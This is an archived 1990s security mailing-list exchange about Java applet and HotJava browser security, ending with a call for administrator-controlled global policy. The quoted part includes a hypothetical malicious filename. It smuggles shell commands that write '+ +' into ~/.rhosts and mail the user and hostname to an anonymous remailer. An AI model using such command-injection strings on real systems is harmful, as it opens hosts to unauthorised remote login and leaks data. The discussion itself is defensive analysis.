Chuck McManis writes:
>
> > 1/ java applet downloaded, does something neat, and also at the same
> > time deposits a file in the allowed file space, containing
> > malicious data. Lets say that it's filename is
> >
> > 'look \n
> > ~!echo + + > ~/.rhosts; echo $user `hostname` > mail anon @
remail .
org'
> >
> > (that was the filename.)
>
> Cute but it doesn't fly. Since Applets cannot replace FileOutputStream
> (the only way to create a file on the host system) and FileOutputStream
> will in fact reject this "name" out of hand, but even if it didn't
> it would put up a dialog box that said, "This applet is trying to open
> '...<your command> ...' should this be allowed? Yes or No?" and the
> user will say "Gee that is a stupid filename, no way!"
This is exactly the sort of problem which exists with java and the
hotjava browser. We the administrators want to set the policy for
how java and hotjava work and do not want the user to be able to
override that policy.
There is going to be one or more users who are more stupid than
the filename.
Allow a global configuration file which the user cannot circumvent
and we are part way to solving many of the problems.
Cheers, Craig
--
Craig Bishop - Internet Security Analyst
csb @
connect .
com .
au
http://www.connect.com.au/people/csb/
Follow-Ups:
References:
|
|
